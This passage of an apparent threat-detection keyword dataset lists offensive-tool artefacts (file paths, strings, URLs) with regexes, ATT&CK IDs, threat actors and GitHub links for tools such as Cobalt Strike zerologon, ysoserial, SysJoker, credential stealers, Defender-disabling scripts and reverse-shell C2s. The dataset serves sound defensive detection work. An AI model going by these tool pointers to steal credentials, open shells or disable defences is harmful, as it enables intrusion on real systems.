- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/ysoserial.jar*",".{0,1000}\/ysoserial\.jar.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/ysoserial/*",".{0,1000}\/ysoserial\/.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*",".{0,1000}\/zejius\/2HZG41Zw\/6Vtmo6w4yQ5tnsBHms64\.php.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*",".{0,1000}\/zejius\/2HZG41Zw\/fJsnC6G4sFg2wsyn4shb\.bin.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*",".{0,1000}\/zejius\/5GPR0iy9\/6Vtmo6w4yQ5tnsBHms64\.php.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*",".{0,1000}\/zejius\/5GPR0iy9\/fJsnC6G4sFg2wsyn4shb\.bin.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/zerologon.cna*",".{0,1000}\/zerologon\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*/zerologon.py*",".{0,1000}\/zerologon\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/zerologon.py*",".{0,1000}\/zerologon\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/zhzyker/CVE-2020-5902*",".{0,1000}\/zhzyker\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/zhzyker/CVE-2020-5902/","1","0","N/A","N/A","1","14","8","2020-07-08T04:10:12Z","2020-07-08T04:02:07Z" "*/ZipExec -*",".{0,1000}\/ZipExec\s\-.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*/ZipExec.git*",".{0,1000}\/ZipExec\.git.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*/ZipExec@latest*",".{0,1000}\/ZipExec\@latest.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*/zsh_executor/*.go*",".{0,1000}\/zsh_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/zwjjustdoit/cve-2022-23131*",".{0,1000}\/zwjjustdoit\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0002 - TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/zwjjustdoit/cve-2022-23131","1","1","N/A","N/A","1","0","4","2022-02-21T04:55:57Z","2022-02-21T02:42:23Z" "*: Defeat-Defender-V1.2.0*",".{0,1000}\:\s\sDefeat\-Defender\-V1\.2\.0.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*://wstunnel.server.com*",".{0,1000}\:\/\/wstunnel\.server\.com.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*:: Remove (s)AINT folder*",".{0,1000}\:\:\sRemove\s\(s\)AINT\sfolder.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*-:[GreenwooD]:- WinX Shell*",".{0,1000}\-\:\[GreenwooD\]\:\-\sWinX\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*:\ProgramData\demo.dll*",".{0,1000}\:\\ProgramData\\demo\.dll.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*:\ProgramData\RecoverySystem\recoveryWindows.zip*",".{0,1000}\:\\ProgramData\\RecoverySystem\\recoveryWindows\.zip.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*:\ProgramData\SystemData\igfxCUIService.exe*",".{0,1000}\:\\ProgramData\\SystemData\\igfxCUIService\.exe.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*:\ProgramData\SystemData\tempo1.txt*",".{0,1000}\:\\ProgramData\\SystemData\\tempo1\.txt.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*:\ProgramData\SystemData\tempo2.txt*",".{0,1000}\:\\ProgramData\\SystemData\\tempo2\.txt.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*:\users\public\*.bat*",".{0,1000}\:\\users\\public\\.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*:\users\public\*.ps1*",".{0,1000}\:\\users\\public\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*:\users\public\*.vbs*",".{0,1000}\:\\users\\public\\.{0,1000}\.vbs.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*:\Users\Public\Music\*.dll*",".{0,1000}\:\\Users\\Public\\Music\\.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*:'123pentest'*",".{0,1000}\:\'123pentest\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*:8070/reverseShellClients*",".{0,1000}\:8070\/reverseShellClients.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*:8080/yara/file*",".{0,1000}\:8080\/yara\/file.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*:8999/Payloads/*",".{0,1000}\:8999\/Payloads\/.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*:9090*/api/v1.0/relays*",".{0,1000}\:9090.{0,1000}\/api\/v1\.0\/relays.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*:CreateProcessFromParent((Get-Process ""lsass"").Id*",".{0,1000}\:CreateProcessFromParent\(\(Get\-Process\s\""lsass\""\)\.Id.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*?convert_ccache_to_kirbi*",".{0,1000}\?convert_ccache_to_kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*?convert_kirbi_to_ccache*",".{0,1000}\?convert_kirbi_to_ccache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*?function Invoke-CylanceDisarm*",".{0,1000}\?function\sInvoke\-CylanceDisarm.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*?PSAmsi*PSReflect.ps1*",".{0,1000}\?PSAmsi.{0,1000}PSReflect\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*@"" ( _/_ _// ~b33f""*",".{0,1000}\@\""\s\(\s_\/_\s\s\s_\/\/\s\s\s\~b33f\"".{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*@author 7etsuo*",".{0,1000}\@author\s7etsuo.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*@etc.2miners.com:*",".{0,1000}\@etc\.2miners\.com\:.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*@mitm_pattern = *",".{0,1000}\@mitm_pattern\s\=\s.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*@mitm_port = *",".{0,1000}\@mitm_port\s\=\s.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*@mitm_servers =*",".{0,1000}\@mitm_servers\s\=.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*@Re@mov@e-@MpTh@re@at*",".{0,1000}\@Re\@mov\@e\-\@MpTh\@re\@at.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*@redpill CS Compiled Executable*",".{0,1000}\@redpill\sCS\sCompiled\sExecutable.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*@WanaDecryptor@.exe*",".{0,1000}\@WanaDecryptor\@\.exe.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[ backdoor - Debug ]*",".{0,1000}\[\sbackdoor\s\-\sDebug\s\].{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*[!] Failed to enumerate Credman:*",".{0,1000}\[!\]\s\s\s\sFailed\sto\senumerate\sCredman\:.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[!] Avoid mixing BetterXencrypt with another techniques*",".{0,1000}\[!\]\sAvoid\smixing\sBetterXencrypt\swith\sanother\stechniques.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[!] Cannot enumerate domain.*",".{0,1000}\[!\]\sCannot\senumerate\sdomain\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*[!] Can't remove the HWBP-Hook for VirtualAlloc !*",".{0,1000}\[!\]\sCan\'t\sremove\sthe\sHWBP\-Hook\sfor\sVirtualAlloc\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*[!] cleaning up all IOCs files to avoid detection!*",".{0,1000}\[!\]\scleaning\sup\sall\sIOCs\sfiles\sto\savoid\sdetection!.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*[!] Could not execute query. Could not bind to LDAP://rootDSE.*",".{0,1000}\[!\]\sCould\snot\sexecute\squery\.\sCould\snot\sbind\sto\sLDAP\:\/\/rootDSE\..{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*[!] Could not extract useful token from specified Teams database!*",".{0,1000}\[!\]\sCould\snot\sextract\suseful\stoken\sfrom\sspecified\sTeams\sdatabase!.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] Couldn't capture the user credential hash :*",".{0,1000}\[!\]\sCouldn\'t\scapture\sthe\suser\scredential\shash\s\:.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[!] Couldn't communicate with the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\scommunicate\swith\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*[!] Couldn't communicate with the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\scommunicate\swith\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[!] Couldn't receive the type2 message from the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\sreceive\sthe\stype2\smessage\sfrom\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[!] 